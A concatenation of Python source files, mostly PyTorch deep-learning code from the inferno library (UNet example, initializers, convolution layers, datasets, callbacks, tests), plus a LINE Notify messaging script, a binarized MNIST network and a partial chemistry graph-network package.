for image, target in test_loader:
# transfer image to gpu
image = image.cuda() if USE_CUDA else image
# get batch size from image
batch_size = image.size()[0]
for b in range(batch_size):
prediction = trainer.apply_model(image)
prediction = torch.nn.functional.sigmoid(prediction)
image = unwrap(image, as_numpy=True, to_cpu=True)
prediction = unwrap(prediction, as_numpy=True, to_cpu=True)
target = unwrap(target, as_numpy=True, to_cpu=True)
fig = plt.figure()
ax = fig.add_subplot(2, 2, 1)
ax.imshow(image[b,0,...])
ax.set_title('raw data')
ax = fig.add_subplot(2, 2, 2)
ax.imshow(target[b,...])
ax.set_title('ground truth')
ax = fig.add_subplot(2, 2, 4)
ax.imshow(prediction[b,...])
ax.set_title('prediction')
fig.tight_layout()
plt.show()
##############################################################################
# Custom UNet
# ----------------------------
# Often one needs to have a UNet with custom layers.
# Here we show how to implement such a customized UNet.
# To this end we derive from :code:`UNetBase`.
# For the sake of this example we will create
# a Unet which uses depthwise convolutions and might be trained on a CPU
from inferno.extensions.models import UNetBase
from inferno.extensions.layers import ConvSELU2D, ConvReLU2D, ConvELU2D, ConvSigmoid2D,Conv2D,ConvActivation
class CheapConv(nn.Module):
def __init__(self, in_channels, out_channels, activated):
super(CheapConv, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
if activated:
self.convs = torch.nn.Sequential(
ConvActivation(in_channels=in_channels, out_channels=in_channels, depthwise=True, kernel_size=(3, 3), activation='ReLU', dim=2),
ConvReLU2D(in_channels=in_channels, out_channels=out_channels, kernel_size=(1,1))
)
else:
self.convs = torch.nn.Sequential(
ConvActivation(in_channels=in_channels, out_channels=in_channels, depthwise=True, kernel_size=(3, 3), activation='ReLU', dim=2),
Conv2D(in_channels=in_channels, out_channels=out_channels, kernel_size=(1,1))
)
def forward(self, x):
assert x.shape[1] == self.in_channels,"input has wrong number of channels"
x = self.convs(x)
assert x.shape[1] == self.out_channels,"output has wrong number of channels"
return x
class CheapConvBlock(nn.Module):
def __init__(self, in_channels, out_channels, activated):
super(CheapConvBlock, self).__init__()
self.activated = activated
self.in_channels = in_channels
self.out_channels = out_channels
if(in_channels != out_channels):
self.start = ConvReLU2D(in_channels=in_channels, out_channels=out_channels, kernel_size=(1,1))
else:
self.start = None
self.conv_a = CheapConv(in_channels=out_channels, out_channels=out_channels, activated=True)
self.conv_b = CheapConv(in_channels=out_channels, out_channels=out_channels, activated=False)
self.activation = torch.nn.ReLU()
def forward(self, x):
x_input = x
if self.start is not None:
x_input = self.start(x_input)
x = self.conv_a(x_input)
x = self.conv_b(x)
x = x + x_input
if self.activated:
x = self.activation(x)
return x
class MySimple2DCpUnet(UNetBase):
def __init__(self, in_channels, out_channels, depth=3, residual=False, **kwargs):
super(MySimple2DCpUnet, self).__init__(in_channels=in_channels, out_channels=out_channels,
dim=2, depth=depth, **kwargs)
def conv_op_factory(self, in_channels, out_channels, part, index):
# last?
last = part == 'up' and index==0
return CheapConvBlock(in_channels=in_channels, out_channels=out_channels, activated=not last),False
from inferno.extensions.layers import RemoveSingletonDimension
model_b = torch.nn.Sequential(
CheapConv(in_channels=image_channels, out_channels=4, activated=True),
MySimple2DCpUnet(in_channels=4, out_channels=pred_channels) ,
RemoveSingletonDimension(dim=1)
)
###################################################
# do the training (with the same functions as before)
trainer = train_model(model=model_b, loaders=[train_loader, validate_loader], save_dir='model_b', lr=0.001)
###################################################
# do the training (with the same functions as before)1
predict(trainer=trainer, test_loader=test_loader)
```
#### File: extensions/initializers/base.py
```python
import torch.nn.init as init
__all__ = ['Initializer',
'Initialization',
'WeightInitFunction',
'BiasInitFunction',
'TensorInitFunction']
class Initializer(object):
"""
Base class for all initializers.
"""
# TODO Support LSTMs and GRUs
VALID_LAYERS = {'Conv1d', 'Conv2d', 'Conv3d',
'ConvTranspose1d', 'ConvTranspose2d', 'ConvTranspose3d',
'Linear', 'Bilinear',
'Embedding'}
def __call__(self, module):
module_class_name = module.__class__.__name__
if module_class_name in self.VALID_LAYERS:
# Apply to weight and bias
try:
if hasattr(module, 'weight'):
self.call_on_weight(module.weight.data)
except NotImplementedError:
# Don't cry if it's not implemented
pass
try:
if hasattr(module, 'bias'):
self.call_on_bias(module.bias.data)
except NotImplementedError:
pass
return module
def call_on_bias(self, tensor):
return self.call_on_tensor(tensor)
def call_on_weight(self, tensor):
return self.call_on_tensor(tensor)
def call_on_tensor(self, tensor):
raise NotImplementedError
@classmethod
def initializes_weight(cls):
return 'call_on_tensor' in cls.__dict__ or 'call_on_weight' in cls.__dict__
@classmethod
def initializes_bias(cls):
return 'call_on_tensor' in cls.__dict__ or 'call_on_bias' in cls.__dict__
class Initialization(Initializer):
def __init__(self, weight_initializer=None, bias_initializer=None):
if weight_initializer is None:
self.weight_initializer = Initializer()
else:
if isinstance(weight_initializer, Initializer):
assert weight_initializer.initializes_weight()
self.weight_initializer = weight_initializer
elif isinstance(weight_initializer, str):
init_function = getattr(init, weight_initializer, None)
assert init_function is not None
self.weight_initializer = WeightInitFunction(init_function=init_function)
else:
# Provison for weight_initializer to be a function
assert callable(weight_initializer)
self.weight_initializer = WeightInitFunction(init_function=weight_initializer)
if bias_initializer is None:
self.bias_initializer = Initializer()
else:
if isinstance(bias_initializer, Initializer):
assert bias_initializer.initializes_bias
self.bias_initializer = bias_initializer
elif isinstance(bias_initializer, str):
init_function = getattr(init, bias_initializer, None)
assert init_function is not None
self.bias_initializer = BiasInitFunction(init_function=init_function)
else:
assert callable(bias_initializer)
self.bias_initializer = BiasInitFunction(init_function=bias_initializer)
def call_on_weight(self, tensor):
return self.weight_initializer.call_on_weight(tensor)
def call_on_bias(self, tensor):
return self.bias_initializer.call_on_bias(tensor)
class WeightInitFunction(Initializer):
def __init__(self, init_function, *init_function_args, **init_function_kwargs):
super(WeightInitFunction, self).__init__()
assert callable(init_function)
self.init_function = init_function
self.init_function_args = init_function_args
self.init_function_kwargs = init_function_kwargs
def call_on_weight(self, tensor):
return self.init_function(tensor, *self.init_function_args, **self.init_function_kwargs)
class BiasInitFunction(Initializer):
def __init__(self, init_function, *init_function_args, **init_function_kwargs):
super(BiasInitFunction, self).__init__()
assert callable(init_function)
self.init_function = init_function
self.init_function_args = init_function_args
self.init_function_kwargs = init_function_kwargs
def call_on_bias(self, tensor):
return self.init_function(tensor, *self.init_function_args, **self.init_function_kwargs)
class TensorInitFunction(Initializer):
def __init__(self, init_function, *init_function_args, **init_function_kwargs):
super(TensorInitFunction, self).__init__()
assert callable(init_function)
self.init_function = init_function
self.init_function_args = init_function_args
self.init_function_kwargs = init_function_kwargs
def call_on_tensor(self, tensor):
return self.init_function(tensor, *self.init_function_args, **self.init_function_kwargs)
```
#### File: extensions/layers/convolutional.py
```python
import torch.nn as nn
import sys
import functools
from ..initializers import (
OrthogonalWeightsZeroBias,
KaimingNormalWeightsZeroBias,
SELUWeightsZeroBias,
)
from ..initializers import Initializer
from .normalization import BatchNormND
from .activations import SELU
from ...utils.exceptions import assert_, ShapeError
from ...utils.partial_cls import register_partial_cls
# we append to this later on
__all__ = [
"GlobalConv2D",
]
_all = __all__
register_partial_cls_here = functools.partial(register_partial_cls, module=__name__)
class ConvActivation(nn.Module):
"""Convolutional layer with 'SAME' padding by default followed by an activation."""
def __init__(
self,
in_channels,
out_channels,
kernel_size,
dim,
activation,
stride=1,
dilation=1,
groups=None,
depthwise=False,
bias=True,
deconv=False,
initialization=None,
valid_conv=False,
):
super(ConvActivation, self).__init__()
# Validate dim
assert_(
dim in [1, 2, 3],
"`dim` must be one of [1, 2, 3], got {}.".format(dim),
ShapeError,
)
self.dim = dim
# Check if depthwise
if depthwise:
# We know that in_channels == out_channels, but we also want a consistent API.
# As a compromise, we allow that out_channels be None or 'auto'.
out_channels = in_channels if out_channels in [None, "auto"] else out_channel
assert_(
in_channels == out_channels,
"For depthwise convolutions, number of input channels (given: {}) "
"must equal the number of output channels (given {}).".format(
in_channels, out_channels
),
ValueError,
)
assert_(
groups is None or groups == in_channels,
"For depthwise convolutions, groups (given: {}) must "
"equal the number of channels (given: {}).".format(groups, in_channels),
)
groups = in_channels
else:
groups = 1 if groups is None else groups
self.depthwise = depthwise
if valid_conv:
self.conv = getattr(nn, "Conv{}d".format(self.dim))(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
dilation=dilation,
groups=groups,
bias=bias,
)
elif not deconv:
# Get padding
padding = self.get_padding(kernel_size, dilation)
self.conv = getattr(nn, "Conv{}d".format(self.dim))(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
padding=padding,
stride=stride,
dilation=dilation,
groups=groups,
bias=bias,
)
else:
self.conv = getattr(nn, "ConvTranspose{}d".format(self.dim))(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
dilation=dilation,
groups=groups,
bias=bias,
)
if initialization is None:
pass
elif isinstance(initialization, Initializer):
self.conv.apply(initialization)
else:
raise NotImplementedError
if isinstance(activation, str):
self.activation = getattr(nn, activation)()
elif isinstance(activation, nn.Module):
self.activation = activation
elif activation is None:
self.activation = None
else:
raise NotImplementedError
def forward(self, input):
conved = self.conv(input)
if self.activation is not None:
activated = self.activation(conved)
else:
# No activation
activated = conved
return activated
def _pair_or_triplet(self, object_):
if isinstance(object_, (list, tuple)):
assert len(object_) == self.dim
return object_
else:
object_ = [object_] * self.dim
return object_
def _get_padding(self, _kernel_size, _dilation):
assert isinstance(_kernel_size, int)
assert isinstance(_dilation, int)
assert _kernel_size % 2 == 1
return ((_kernel_size - 1) // 2) * _dilation
def get_padding(self, kernel_size, dilation):
kernel_size = self._pair_or_triplet(kernel_size)
dilation = self._pair_or_triplet(dilation)
padding = [
self._get_padding(_kernel_size, _dilation)
for _kernel_size, _dilation in zip(kernel_size, dilation)
]
return tuple(padding)
# for consistency
ConvActivationND = ConvActivation
# noinspection PyUnresolvedReferences
class _BNReLUSomeConv(object):
def forward(self, input):
normed = self.batchnorm(input)
activated = self.activation(normed)
conved = self.conv(activated)
return conved
class BNReLUConvBaseND(_BNReLUSomeConv, ConvActivation):
def __init__(self, in_channels, out_channels, kernel_size, dim, stride=1, dilation=1, deconv=False):
super(BNReLUConvBaseND, self).__init__(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
dim=dim,
stride=stride,
activation=nn.ReLU(inplace=True),
dilation=dilation,
deconv=deconv,
initialization=KaimingNormalWeightsZeroBias(0),
)
self.batchnorm = BatchNormND(dim, in_channels)
def _register_conv_cls(conv_name, fix=None, default=None):
if fix is None:
fix = {}
if default is None:
default = {}
# simple conv activation
activations = ["ReLU", "ELU", "Sigmoid", "SELU", ""]
init_map = {
"ReLU": KaimingNormalWeightsZeroBias,
"SELU": SELUWeightsZeroBias
}
for activation_str in activations:
cls_name = cls_name = "{}{}ND".format(conv_name,activation_str)
__all__.append(cls_name)
initialization_cls = init_map.get(activation_str, OrthogonalWeightsZeroBias)
if activation_str == "":
activation = None
_fix = {**fix}
_default = {'activation':None}
elif activation_str == "SELU":
activation = nn.SELU(inplace=True)
_fix={**fix, 'activation':activation}
_default = {**default}
else:
activation = activation_str
_fix={**fix, 'activation':activation}
_default = {**default}
register_partial_cls_here(ConvActivation, cls_name,
fix=_fix,
default={**_default, 'initialization':initialization_cls()}
)
for dim in [1, 2, 3]:
cls_name = "{}{}{}D".format(conv_name,activation_str, dim)
__all__.append(cls_name)
register_partial_cls_here(ConvActivation, cls_name,
fix={**_fix, 'dim':dim},
default={**_default, 'initialization':initialization_cls()}
)
def _register_bnr_conv_cls(conv_name, fix=None, default=None):
if fix is None:
fix = {}
if default is None:
default = {}
for dim in [1, 2, 3]:
cls_name = "BNReLU{}ND".format(conv_name)
__all__.append(cls_name)
register_partial_cls_here(BNReLUConvBaseND, cls_name,fix=fix,default=default)
for dim in [1, 2, 3]:
cls_name = "BNReLU{}{}D".format(conv_name, dim)
__all__.append(cls_name)
register_partial_cls_here(BNReLUConvBaseND, cls_name,
fix={**fix, 'dim':dim},
default=default)
# conv classes
_register_conv_cls("Conv")
_register_conv_cls("ValidConv", fix=dict(valid_conv=True))
_register_conv_cls("Deconv", fix=dict(deconv=True), default=dict(kernel_size=2, stride=2))
_register_conv_cls("StridedConv", default=dict(stride=2))
_register_conv_cls("DilatedConv", fix=dict(dilation=2))
_register_conv_cls("DepthwiseConv", fix=dict(deconv=False, depthwise=True), default=dict(out_channels='auto'))
# BatchNormRelu classes
_register_bnr_conv_cls("Conv", fix=dict(deconv=False))
_register_bnr_conv_cls("Deconv", fix=dict(deconv=True))
_register_bnr_conv_cls("StridedConv", default=dict(stride=2))
_register_bnr_conv_cls("DilatedConv", default=dict(dilation=2))
_register_bnr_conv_cls("DepthwiseConv", fix=dict(deconv=False, depthwise=True), default=dict(out_channels='auto'))
del _register_conv_cls
del _register_bnr_conv_cls
class GlobalConv2D(nn.Module):
"""From https://arxiv.org/pdf/1703.02719.pdf
Main idea: we can have a bigger kernel size computationally acceptable
if we separate 2D-conv in 2 1D-convs """
def __init__(
self,
in_channels,
out_channels,
kernel_size,
local_conv_type,
activation=None,
use_BN=False,
**kwargs
):
super(GlobalConv2D, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
assert isinstance(kernel_size, (int, list, tuple))
if isinstance(kernel_size, int):
kernel_size = (kernel_size,) * 2
self.kwargs = kwargs
self.conv1a = local_conv_type(
in_channels=self.in_channels,
out_channels=self.out_channels,
kernel_size=(kernel_size[0], 1),
**kwargs
)
self.conv1b = local_conv_type(
in_channels=self.out_channels,
out_channels=self.out_channels,
kernel_size=(1, kernel_size[1]),
**kwargs
)
self.conv2a = local_conv_type(
in_channels=self.in_channels,
out_channels=self.out_channels,
kernel_size=(1, kernel_size[1]),
**kwargs
)
self.conv2b = local_conv_type(
in_channels=self.out_channels,
out_channels=self.out_channels,
kernel_size=(kernel_size[0], 1),
**kwargs
)
if use_BN:
self.batchnorm = nn.BatchNorm2d(self.out_channels)
else:
self.batchnorm = None
self.activation = activation
def forward(self, input_):
out1 = self.conv1a(input_)
out1 = self.conv1b(out1)
out2 = self.conv2a(input_)
out2 = self.conv2b(out2)
out = out1.add(1, out2)
if self.activation is not None:
out = self.activation(out)
if self.batchnorm is not None:
out = self.batchnorm(out)
return out
```
#### File: io/box/binary_blobs.py
```python
import torch.utils.data as data
import skimage.data
import numpy
from operator import mul
from functools import reduce
class BinaryBlobs(data.Dataset):
def __init__(self, size=20, length=512, blob_size_fraction=0.1,
n_dim=2, volume_fraction=0.5,split='train',
uniform_noise_range=(-1.2, 1.2),
gaussian_noise_sigma=1.2,
noise_scale_factor=8,
image_transform=None,
label_transform=None,
joint_transform=None):
# how many images are in the dataset
self.size = size
# blob related members
self.length = length
self.blob_size_fraction = blob_size_fraction
self.n_dim = n_dim
self.volume_fraction = volume_fraction
# which split {'train', 'test', 'validate'}
self.split = split
# noise related members
self.uniform_noise_range = uniform_noise_range
self.gaussian_noise_sigma = float(gaussian_noise_sigma)
self.noise_scale_factor = noise_scale_factor
# transforms
self.image_transform = image_transform
self.label_transform = label_transform
self.joint_transform = joint_transform
# internal
split_to_seed = dict(train=0, test=1, validate=2)
self.master_seed = split_to_seed[self.split]*self.size
def __getitem__(self, index):
# generate the labels
label = skimage.data.binary_blobs(
length=self.length,
blob_size_fraction=self.blob_size_fraction,
n_dim=self.n_dim,
volume_fraction=self.volume_fraction,
seed=self.master_seed + index)
# make the raw image [-1,1]
image = label.astype('float32')*2
image -= 1
# add uniform noise
low, high = self.uniform_noise_range
uniform_noise = numpy.random.uniform(low=low, high=high,
size=image.size)
image += uniform_noise.reshape(image.shape)
# add gaussian noise
gaussian_noise = numpy.random.normal(scale=self.gaussian_noise_sigma,
size=image.size)
image += gaussian_noise.reshape(image.shape)
# generate noise at lower scales
small_shape = [s//self.noise_scale_factor for s in label.shape]
small_size = reduce(mul, small_shape, 1)
small_noise_img = numpy.random.uniform(low=low, high=high,
size=small_size)
small_noise_img = small_noise_img.reshape(small_shape)
gaussian_noise = numpy.random.normal(scale=self.gaussian_noise_sigma,
size=small_size)
small_noise_img += gaussian_noise.reshape(small_shape)
noise_img = skimage.transform.resize(image = small_noise_img,
output_shape=image.shape, mode='reflect')
image += noise_img
image -= image.mean()
image /= image.std()
label = label.astype('long')
try:
# Apply transforms
if self.image_transform is not None:
image = self.image_transform(image)
if self.label_transform is not None:
label = self.label_transform(label)
if self.joint_transform is not None:
image, label = self.joint_transform(image, label)
except Exception:
print("[!] An Exception occurred while applying the transforms at "
"index {} of split '{}'.".format(index, self.split))
raise
image = image[None,...]
return image, label
def __len__(self):
return self.size
def get_binary_blob_loaders(train_batch_size=1, test_batch_size=1,
num_workers=1,
train_image_transform=None,
train_label_transform=None,
train_joint_transform=None,
validate_image_transform=None,
validate_label_transform=None,
validate_joint_transform=None,
test_image_transform=None,
test_label_transform=None,
test_joint_transform=None,
**kwargs):
trainset = BinaryBlobs(split='train', image_transform=train_image_transform,
label_transform=train_label_transform, joint_transform=train_joint_transform, **kwargs)
testset = BinaryBlobs(split='test', image_transform=test_image_transform,
label_transform=test_label_transform, joint_transform=test_joint_transform, **kwargs)
validset = BinaryBlobs(split='validate',image_transform=validate_image_transform,
label_transform=validate_label_transform, joint_transform=validate_joint_transform, **kwargs)
trainloader = data.DataLoader(trainset, batch_size=train_batch_size,
num_workers=num_workers)
testloader = data.DataLoader(testset, batch_size=test_batch_size,
num_workers=num_workers)
validloader = data.DataLoader(validset, batch_size=test_batch_size,
num_workers=num_workers)
return trainloader, testloader, validloader
if __name__ == "__main__":
ds = BinaryBlobs()
ds[0]
```
#### File: trainers/callbacks/gradients.py
```python
from ...utils.train_utils import Frequency
from ...utils.exceptions import assert_, FrequencyValueError
from .base import Callback
class LogOutputGradients(Callback):
"""Logs the gradient of the network output"""
def __init__(self, frequency):
super(LogOutputGradients, self).__init__()
self.log_every = frequency
self.registered = False
self.hook_handle = None
@property
def log_every(self):
return self._log_every
@log_every.setter
def log_every(self, value):
self._log_every = Frequency(value, 'iterations')
assert_(self.log_every.is_consistent,
"Log frequency is not consistent.",
FrequencyValueError)
def hook(self, module, grad_input, grad_output):
#remove hook if trainer does not exits
if self.trainer is None:
self.hook_handle.remove()
return
if self.log_every.match(iteration_count=self.trainer.iteration_count,
epoch_count=self.trainer.epoch_count,
persistent=True, match_zero=True):
self.trainer.update_state('output_gradient', grad_output[0].detach().float().clone().cpu())
def add_hook(self):
self.hook_handle = self.trainer.model.register_backward_hook(self.hook)
def begin_of_fit(self, **kwargs):
self._trainer.logger.observe_state("output_gradient",
observe_while='training')
self.add_hook()
def begin_of_save(self, **_):
# remove hook from model, because you can't pickle it.
if self.hook_handle is not None:
self.hook_handle.remove()
self.hook_handle = None
def end_of_save(self, **_):
# add hook after model save
self.add_hook()
```
#### File: callbacks/logging/base.py
```python
import os
from ..base import Callback
class Logger(Callback):
"""
A special callback for logging.
Loggers are special because they're required to be serializable, whereas other
callbacks have no such guarantees. In this regard, they jointly handled by
trainers and the callback engine.
"""
def __init__(self, log_directory=None):
super(Logger, self).__init__()
self._log_directory = None
if log_directory is not None:
self.set_log_directory(log_directory)
@property
def log_directory(self):
if self._log_directory is not None:
return self._log_directory
elif self.trainer is not None and self.trainer._log_directory is not None:
return self.trainer._log_directory
else:
raise RuntimeError("No log directory found.")
@log_directory.setter
def log_directory(self, value):
self.set_log_directory(value)
def set_log_directory(self, log_directory):
assert isinstance(log_directory, str)
if not os.path.isdir(log_directory):
assert not os.path.exists(log_directory)
os.makedirs(log_directory)
self._log_directory = log_directory
return self
```
#### File: callbacks/logging/__init__.py
```python
__all__ = ['get_logger']
try:
INFERNO_WITH_TENSORBOARD_LOGGER = True
from .tensorboard import TensorboardLogger
__all__.append('TensorboardLogger')
except ImportError:
INFERNO_WITH_TENSORBOARD_LOGGER = False
def get_logger(name):
if name in globals():
return globals().get(name)
else:
raise NotImplementedError("Logger not found.")
```
#### File: trainers/callbacks/tqdmstub.py
```python
from .base import Callback
class TQDMProgressBar(Callback):
def __init__(self, *args, **kwargs):
super(TQDMProgressBar, self).__init__(*args, **kwargs)
def bind_trainer(self, *args, **kwargs):
super(TQDMProgressBar, self).bind_trainer(*args, **kwargs)
self.trainer.console.warning("tqdm is not installed. will fall back to normal stdout console.")
def begin_of_fit(self, **_):
pass
```
#### File: test_extensions/test_layers/test_device.py
```python
import unittest
from inferno.extensions.layers.device import DeviceTransfer, OnDevice
import torch
class TransferTest(unittest.TestCase):
@unittest.skipIf(not torch.cuda.is_available(), "GPU not available.")
def test_device_transfer(self):
if not torch.cuda.is_available():
return
# Build transfer model
transfer = DeviceTransfer('cpu')
x = torch.rand(10, 10).cuda()
y = transfer(x)
loss = y.mean()
loss.backward()
self.assertFalse(y.data.is_cuda)
self.assertIsNotNone(x.grad)
self.assertTrue(x.grad.data.is_cuda)
@unittest.skipIf(not torch.cuda.is_available(), "GPU not available.")
def test_on_device(self):
if not torch.cuda.is_available():
return
# Build variable on the GPU
x = torch.rand(1, 10)
# Build model over multiple devices
multi_device_model = torch.nn.Sequential(OnDevice(torch.nn.Linear(10, 10), 'cuda'),
OnDevice(torch.nn.Linear(10, 10), 'cpu'))
y = multi_device_model(x)
self.assertIsInstance(y.data, torch.FloatTensor)
if __name__ == '__main__':
unittest.main()
```
#### File: test_callbacks/test_logging/test_tensorboard.py
```python
import unittest
import os
from shutil import rmtree
import numpy as np
import torch
import torch.nn as nn
from inferno.trainers.basic import Trainer
from torch.utils.data.dataset import TensorDataset
from torch.utils.data.dataloader import DataLoader
from inferno.trainers.callbacks.logging.tensorboard import TensorboardLogger
from inferno.extensions.layers.reshape import AsMatrix
class TestTensorboard(unittest.TestCase):
ROOT_DIR = os.path.dirname(__file__)
PRECISION = 'float'
SAVE_DIRECTORY = os.path.join(ROOT_DIR, 'saves')
LOG_DIRECTORY = os.path.join(ROOT_DIR, 'logs')
@staticmethod
def _make_test_model(input_channels):
toy_net = nn.Sequential(nn.Conv2d(input_channels, 8, 3, 1, 1),
nn.ELU(),
nn.MaxPool2d(2),
nn.Conv2d(8, 8, 3, 1, 1),
nn.ELU(),
nn.MaxPool2d(2),
nn.Conv2d(8, 16, 3, 1, 1),
nn.ELU(),
nn.AdaptiveMaxPool2d((1, 1)),
AsMatrix(),
nn.Linear(16, 10))
return toy_net
def tearDown(self):
for d in [self.SAVE_DIRECTORY, self.LOG_DIRECTORY]:
try:
rmtree(d)
except OSError:
pass
def get_random_dataloaders(self, input_channels=3):
# Convert build random tensor dataset
data_shape = (1, input_channels, 64, 64)
target_shape = (1)
random_array = torch.from_numpy(np.random.rand(*data_shape)).float()
target_array = torch.from_numpy(np.random.randint(0, 9, size=target_shape))
train_dataset = TensorDataset(random_array, target_array)
test_dataset = TensorDataset(random_array, target_array)
# Build dataloaders from dataset
train_loader = DataLoader(train_dataset, batch_size=1,
shuffle=True, num_workers=0, pin_memory=False)
test_loader = DataLoader(test_dataset, batch_size=1,
shuffle=True, num_workers=0, pin_memory=False)
return train_loader, test_loader
def get_trainer(self, input_channels):
# Build model
net = self._make_test_model(input_channels)
# Build trainer
trainer = Trainer(net)\
.build_logger(TensorboardLogger(send_image_at_batch_indices=0,
send_image_at_channel_indices='all',
log_images_every=(20, 'iterations')),
log_directory=self.LOG_DIRECTORY)\
.build_criterion('CrossEntropyLoss')\
.build_metric('CategoricalError')\
.build_optimizer('Adam')\
.validate_every((1, 'epochs'))\
.save_every((2, 'epochs'), to_directory=self.SAVE_DIRECTORY)\
.save_at_best_validation_score()\
.set_max_num_epochs(2)\
.set_precision(self.PRECISION)
# Bind loaders
train_loader, test_loader = self.get_random_dataloaders(input_channels=input_channels)
trainer.bind_loader('train', train_loader).bind_loader('validate', test_loader)
return trainer
def test_tensorboard(self):
trainer = self.get_trainer(3)
trainer.fit()
def test_tensorboard_grayscale(self):
trainer = self.get_trainer(1)
trainer.fit()
def test_serialization(self):
trainer = self.get_trainer(3)
# Serialize
trainer.save()
# Unserialize
trainer = Trainer().load(os.path.join(self.ROOT_DIR, 'saves'))
train_loader, test_loader = self.get_random_dataloaders(input_channels=3)
trainer.bind_loader('train', train_loader).bind_loader('validate', test_loader)
trainer.fit()
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "0h-n0/linensend",
"score": 3
} |
#### File: 0h-n0/linensend/linesend.py
```python
import requests
def line_notify(line_token, message):
endpoint = 'https://notify-api.line.me/api/notify'
message = "\n{}".format(message)
payload = {'message': message}
headers = {'Authorization': 'Bearer {}'.format(line_token)}
requests.post(endpoint, data=payload, headers=headers)
print(f"Send your message: {message}")
def get_args():
import argparse
description = ('send a message from command line to LINE service.',
' Before sending a message, You have to create your ',
'access token via https://notify-bot.line.me/my/.')
parser = argparse.ArgumentParser(description=description)
parser.add_argument('-t', '--token',
action='store',
nargs='?',
const=None,
required=True,
type=str,
choices=None,
help=('set your LINE token.'),
metavar=None)
parser.add_argument('-m', '--message',
action='store',
nargs='?',
const=None,
required=True,
type=str,
choices=None,
help=('set your message.'),
metavar=None)
return parser.parse_args()
def commandline():
args = get_args()
line_notify(args.token, args.message)
``` |
{
"source": "0h-n0/NeuralNetworkPhys",
"score": 3
} |
#### File: 0h-n0/NeuralNetworkPhys/binary_net.py
```python
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
import torch.nn.functional as F
from torchvision import datasets, transforms
class BinaryLinear(nn.Module):
def __init__(self, in_size, out_size):
super(BinaryLinear, self).__init__()
self.in_size = in_size
self.out_size = out_size
self.fc = nn.Linear(in_size, out_size)
self.init_weights()
self.set_hook()
def init_weights(self):
def _init_weights(m):
if type(m) == nn.Linear:
binary_w = np.random.choice([-1, 1],
size=(self.in_size,
self.out_size))
binary_b = np.random.choice([-1, 1],
size=(self.in_size))
binary_w = binary_w.astype(np.float32)
binary_b = binary_b.astype(np.float32)
m.weight.data = torch.FloatTensor(binary_w)
m.bias.data = torch.FloatTensor(binary_b)
self.apply(_init_weights)
def set_hook(self):
def binarize(m, inputs):
w = m.fc.weight.data.numpy()
w = np.where(w > 0, 1, -1)
b = m.fc.bias.data.numpy()
b = np.where(b > 0, 1, -1)
m.fc.weight.data = \
torch.FloatTensor(w.astype(np.float32))
m.fc.bias.data = \
torch.FloatTensor(b.astype(np.float32))
self.register_forward_pre_hook(binarize)
def forward(self, x):
return self.fc(x)
class BinaryNet(nn.Module):
def __init__(self):
super(BinaryNet, self).__init__()
self.fc1 = BinaryLinear(784, 200)
self.fc2 = BinaryLinear(200, 50)
self.fc3 = BinaryLinear(50, 10)
def forward(self, x):
x = x.view(-1, 784)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x)
lr = 0.01
momentum = 0.9
batch_size = 10
epochs = 10
cuda = None
kwargs = {'num_workers': 1, 'pin_memory': True} if cuda else {}
train_loader = torch.utils.data.DataLoader(
datasets.MNIST('../data', train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])),
batch_size=batch_size, shuffle=True, **kwargs)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST('../data', train=False, transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])),
batch_size=batch_size, shuffle=True, **kwargs)
model = BinaryNet()
optimizer = optim.SGD(model.parameters(),
lr=lr, momentum=momentum)
loss_fn = torch.nn.CrossEntropyLoss(size_average=False)
def train(epoch):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
if cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
optimizer.zero_grad()
output = model(data)
loss = loss_fn(output, target)
loss.backward()
optimizer.step()
if batch_idx % 100 == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.data[0]))
for epoch in range(1, epochs + 1):
train(epoch)
``` |
{
"source": "0h-n0/pybiodata",
"score": 2
} |
#### File: pybiodata/pybiodata/pdb.py
```python
import requests
from .base import AbstractDatabase
from .database_urls import PDB_REST_URL, PDB_DOWNLOAD_URL
class PDB(AbstractDatabase):
def __init__(self, parser):
self.args = vars(parser.parse_args())
def run(self):
pdb_id = self.args['id']
filename = f'{pdb_id}.pdb'
with requests.get(PDB_DOWNLOAD_URL + f'/{filename}', stream=True) as r:
r.raise_for_status()
with open(filename, 'wb') as f:
for chunk in r.iter_content(chunk_size=8192):
if chunk:
f.write(chunk)
return filename
@classmethod
def set_command_arguments(cls):
parser = super().set_command_arguments()
parser.add_argument('--id', help='set PDBID')
return parser
``` |
{
"source": "0h-n0/pytorch_chemistry",
"score": 2
} |
#### File: torch_chemistry/datasets/base_dataset.py
```python
from torch.utils.data import Dataset
import rdkit
from torch_geometric.data import InMemoryDataset
class InMemoryRdkitDataset(InMemoryDataset):
edge_types = {rdkit.Chem.rdchem.BondType.SINGLE: 0,
rdkit.Chem.rdchem.BondType.DOUBLE: 1,
rdkit.Chem.rdchem.BondType.TRIPLE: 2,
rdkit.Chem.rdchem.BondType.AROMATIC: 3}
def __init__(self, root, tranform=None, pre_transform=None, pre_filter=None):
super(InMemoryRdkitDataset, self).__init__(root, tranform, pre_transform, pre_filter)
def __str__(self):
return self.__name__
```
#### File: nn/conv/sg_conv.py
```python
import torch
from torch.nn import Parameter
from . import GNNConv
from ..init import uniform
class SGCConv(GNNConv):
def __init__(self, in_channels, out_channels,
bias=True, **kwargs):
pass
```
#### File: nn/metrics/metric.py
```python
import torch.nn as nn
from ..functional.metric import *
class ROCCurve(nn.Module):
def __init__(self):
super(ROCCurve, self).__init__()
def forward(self, pred, target):
return roc_curve(pred, target)
class ROCAUCScore(nn.Modele):
